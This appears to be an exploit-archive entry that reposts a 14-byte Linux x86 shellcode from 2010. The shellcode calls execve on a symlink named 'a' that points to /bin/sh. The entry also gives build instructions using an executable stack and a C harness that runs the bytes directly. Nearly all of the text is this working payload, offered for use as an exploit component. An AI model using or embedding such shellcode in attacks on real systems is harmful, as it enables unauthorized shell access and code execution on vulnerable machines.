linux/x86 execve("a->/bin/sh") Local-only Shellcode 14 Bytes

2010-04-17T00:00:00
ID 1337DAY-ID-11852
Type zdt
Reporter Magnefikko
Modified 2010-04-17T00:00:00

Description

Exploit for linux/x86 platform in category shellcode

                                        
                                            ============================================================
linux/x86 execve("a->/bin/sh") Local-only Shellcode 14 Bytes
============================================================

#include <stdio.h>
#include <string.h>
 
/*
    by Magnefikko
    17.04.2010
    [email protected]
    Promhyl Studies :: http://promhyl.oz.pl
    Subgroup: #PRekambr
    Name: 14 bytes execve("a->/bin/sh") local-only shellcode
    Platform: Linux x86
     
    execve("a", 0, 0);
 
    $ ln -s /bin/sh a
    $ gcc -Wl,-z,execstack filename.c
    $ ./a.out
     
    Link is required.
 
    shellcode:
 
\x31\xc0\x50\x6a\x61\x89\xe3\x99\x50\xb0\x0b\x59\xcd\x80
 
*/
 
 
int main(){
    char shell[] = "\x31\xc0\x50\x6a\x61\x89\xe3\x99\x50\xb0\x0b\x59\xcd\x80";
    printf("by Magnefikko\[email protected]\npromhyl.oz.pl\n\nstrlen(shell)
= %d\n", strlen(shell));
    (*(void (*)()) shell)();
}



#  0day.today [2018-04-11]  #